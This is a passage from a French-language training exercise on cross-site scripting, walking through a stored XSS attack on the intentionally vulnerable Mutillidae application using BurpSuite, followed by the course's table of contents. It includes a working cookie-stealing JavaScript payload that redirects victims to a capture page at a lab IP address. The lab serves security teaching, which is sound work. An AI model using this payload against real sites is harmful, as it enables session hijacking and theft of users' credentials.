de données. Il peut alors être intéressant de tenter d’injecter du code <i>JavaScript</i> afin de réaliser un <i>XSS</i> permanent. Autrement dit, tout utilisateur qui ouvrira cette page de <i>logs</i> sera infecté par notre code malveillant. Le but de l’attaquant étant d’enregistrer, via une page malveillante, les identifiants de session des victimes.</p> <p class="Standard" style='margin-bottom:7.0pt;line-height:120%'> </p> <p class="Standard" style='margin-bottom:7.0pt;line-height:120%'> <b>Étape n°2 : Réalisation du défi</b></p> <p class="Standard" style='margin-bottom:7.0pt;line-height:120%'> Aller sur la page <b>Login/Register</b> et positionner le <i>proxy BurpSuite</i> à <b>intercept on</b> et tenter à nouveau de s’authentifier avec un compte inexistant (<i>test2</i> par exemple).</p> <p class="Standard" style='margin-bottom:7.0pt;line-height:120%'> <img width="326" height="142" src= "owasp-activite3_AttaqueXSS_fichiers/image028.jpg" align="left" hspace="12" alt="image" /></p> <p class="Standard" style='margin-bottom:7.0pt;line-height:120%'> <b> </b></p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"><b> </b></p> <p class="Standard"><b> </b></p> <p class="Standard"><b> </b></p> <p class="Standard">Valider en cliquant sur le bouton <b>Login</b>. Le message « <i>Account does not exist</i> » apparaît</p> <p class="Standard"> </p> <p class="Standard">Au niveau du <i>proxy BurpSuite</i>, cliquez sur <b>Forward</b> jusqu’à l’obtention de la capture suivante :</p> <p class="Standard"></p> <table cellpadding="0" cellspacing="0" align="left"> <tr> <td width="98" height="3271"></td> <td width="62"></td> <td width="8"></td> <td width="121"></td> </tr> <tr> <td height="31"></td> <td colspan="2"></td> <td align="left" valign="top"><img width="97" height="25" src= "owasp-activite3_AttaqueXSS_fichiers/image029.gif" alt= "image" /></td> </tr> <tr> <td height="91"></td> </tr> <tr> <td height="29"></td> <td align="left" valign="top"><img width="50" height="23" src= "owasp-activite3_AttaqueXSS_fichiers/image030.gif" alt= "image" /></td> </tr> </table> <br clear="all" /> <p class="Standard"><img width="566" height="321" src= "owasp-activite3_AttaqueXSS_fichiers/image031.jpg" align="left" hspace="12" alt="image" /><span style= 'position:absolute;z-index:40;left:0px;margin-left:198px;margin-top:3283px; width:16px;height:126px'><img width="13" height="101" src="owasp-activite3_AttaqueXSS_fichiers/image032.gif" alt="image" /></span><span style= 'position:absolute;z-index:41;left:0px;margin-left:199px;margin-top:3425px; width:128px;height:61px'><img width="102" height="49" src="owasp-activite3_AttaqueXSS_fichiers/image033.gif" alt="image" /></span><b><span style='color:maroon'>Attention les adresses IP peuvent différer selon votre configuration,</span></b></p> <p class="Standard" style='margin-bottom:2.85pt'><b> </b></p> <p class="Standard" style='margin-bottom:2.85pt'>Toujours avec <i>BurpSuite</i>, cliquer sur l’onglet <b>Decoder</b> et saisir le code malveillant suivant :</p> <table class="MsoNormalTable" border="0" cellspacing="0" cellpadding="0" width="0" style='border-collapse:collapse'> <tr> <td width="605" valign="top" style= 'width:453.75pt;border:solid black 1.0pt; padding:2.75pt 2.75pt 2.75pt 2.75pt'> <p class="TableContents"><i><span style= 'font-size:12.0pt'><script>document.location=</span></i><i><span style='font-size:12.0pt;font-family:Ubuntu'>"</span></i><i><span style='font-size:12.0pt'>http://192.168.0.10/mutillidae/index.php?page=capture-data.php&c=</span></i><i><span style='font-size:12.0pt;font-family:Ubuntu'>"</span></i><i><span style='font-size:12.0pt'>+document.cookie</script></span></i></p> </td> </tr> </table> <p class="Standard"> </p> <p class="Standard">Dans ce code, l’attaquant redirige la victime vers la page <i>capture-data.php</i> qui va enregistrer le <i>cookie</i> d’identification. La page <b><i>capture-data.php</i></b>est déjà fournie par <i>Mutillidae</i> pour les besoins de la démonstration. Lorsque le script est saisi, il est alors possible de l’encoder en cliquant sur <b>Encode as URL</b>.</p> <p class="Standard"> </p> <p class="Standard"></p> <table cellpadding="0" cellspacing="0" align="left"> <tr> <td width="354" height="3133"></td> <td width="69"></td> <td width="223"></td> <td width="108"></td> </tr> <tr> <td height="29"></td> <td align="left" valign="top"><img width="55" height="23" src= "owasp-activite3_AttaqueXSS_fichiers/image034.gif" alt= "image" /></td> </tr> <tr> <td height="57"></td> </tr> <tr> <td height="29"></td> <td colspan="2"></td> <td align="left" valign="top"><img width="86" height="23" src= "owasp-activite3_AttaqueXSS_fichiers/image035.gif" alt= "image" /></td> </tr> </table> <img width="605" height="161" src= "owasp-activite3_AttaqueXSS_fichiers/image036.jpg" align="left" hspace="12" alt="image" /> <p class="Standard"> </p> <br clear="all" /> <p class="Standard">Ensuite, copier le code généré et remplacer la valeur saisie précédemment (<i>test2</i>) par ce code.</p> <p class="Standard"> </p> <p class="Standard">Pour cela, procéder par un copier/coller dans <i>Proxy/Raw.</i></p> <p class="Standard"><span style= 'position:relative;z-index:27;left:-2px; top:3393px;width:758px;height:3437px'> <img width="606" height="35" src= "owasp-activite3_AttaqueXSS_fichiers/image037.gif" alt= "image" /></span> </p> <br clear="all" /> <p class="Standard"><img width="605" height="186" src= "owasp-activite3_AttaqueXSS_fichiers/image038.jpg" align="left" hspace="12" alt="image" /></p> <p class="Standard">Il ne reste plus qu’à cliquer sur le bouton <b>Forward</b> du <i>proxy Burpsuite</i>.</p> <p class="Standard"> </p> <p class="Standard">Côté <i>Mutillidae</i>, rien d’extraordinaire, un message indique que le compte testé n’existe pas.</p> <p class="Standard"><b> </b></p> <p class="Standard"><img width="374" height="87" src= "owasp-activite3_AttaqueXSS_fichiers/image039.jpg" align="left" hspace="12" alt="image" /></p> <p class="Standard"><b> </b></p> <p class="Standard"><b> </b></p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard">Cependant, notre code <i>JavaScript</i> est maintenant inséré dans la base de données ce qui entraîne son empoisonnement. Pour le vérifier, il faut consulter la page affichant les <i>logs</i>.</p> <p class="Standard"> </p> <p class="Standard">Positionner le <i>proxy BurpSuite</i> à <b>intercept off</b> puis ouvrir la page des <i>logs</i>.</p> <p class="Standard"> </p> <p class="Standard">La consultation de cette page entraîne un accès à la base de données et donc l’exécution de notre code malveillant ce qui nous redirige vers la page <b><i>capture-data.php</i></b> de l’attaquant.</p> <p class="Standard"> </p> <p class="Standard"><img width="605" height="300" src= "owasp-activite3_AttaqueXSS_fichiers/image040.jpg" align="left" hspace="12" alt="image" /></p> <p class="Standard">Cette page comporte un lien (<i>captured-data.php</i>) permettant de voir les identifiants des sessions capturés.</p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"></p> <table cellpadding="0" cellspacing="0" align="left"> <tr> <td width="755" height="3541"></td> </tr> <tr> <td></td> <td><img width="215" height="49" src= "owasp-activite3_AttaqueXSS_fichiers/image041.gif" alt= "image" /></td> </tr> </table> <br clear="all" /> <p class="Standard"><img width="605" height="136" src= "owasp-activite3_AttaqueXSS_fichiers/image042.jpg" align="left" hspace="12" alt="image" /></p> <p class="Standard">L’attaquant dispose du <i>cookie</i> d’identification de la victime.</p> <p class="Standard"> </p> <p class="Standard"><i><span style= 'color:#000099'> </span></i></p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"><span style='color:#000099'> </span></p> </div> <div><br clear="all" /> <hr align="left" size="1" width="33%" /> <div id="ftn1"> <p class="Footnote"><a href="start.htm#_ftnref1" name="_ftn1" title=""><span class="MsoFootnoteReference"><span class= "MsoFootnoteReference"><span style= 'font-size:10.0pt;font-family:"Arial",sans-serif;color:navy'>[1]</span></span></span></a>Défacement de site <i>Web</i> : Le défacement ou défaçage de site internet est une technique qui vise à remplacer la page principale ou toutes les pages d’un site par une page <i>Web</i> spécifique.</p> </div> </div>
Table des matières
Sujets
Recherche
Activité 3: Vulnérabilités de type XSS (Cross Site Scripting)
I Présentation générale
1 Présentation des failles de type XSS
2 Les catégories de failles XSS
II Exemples de codes liés à une attaque de type XSS
III Conséquences d’une attaque de type XSS
IV Bonnes pratiques
V Objectifs et architecture générale de l’activité
VI Premier défi : XSS réfléchi via un contexte HTML
1 Objectif
2 À vous de jouer
VII Deuxième défi : XSS permanent via une page affichant des logs
1 Objectif
2 À vous de jouer
VIII Conclusion
Dossier 1 : XSS réfléchi via un contexte HTML
1 Objectif
1 Objectif
1 Présentation des failles de type XSS
2 Les catégories de failles XSS
2 À vous de jouer
2 À vous de jouer
Activité 3: Vulnérabilités de type XSS (Cross Site Scripting)
Dossier 1 : XSS réfléchi via un contexte HTML
III Conséquences d’une attaque de type XSS
II Exemples de codes liés à une attaque de type XSS
IV Bonnes pratiques
I Présentation générale
VIII Conclusion
VII Deuxième défi : XSS permanent via une page affichant des logs
VI Premier défi : XSS réfléchi via un contexte HTML
V Objectifs et architecture générale de l’activité
Générée avec
chmProcessor
Générée avec
chmProcessor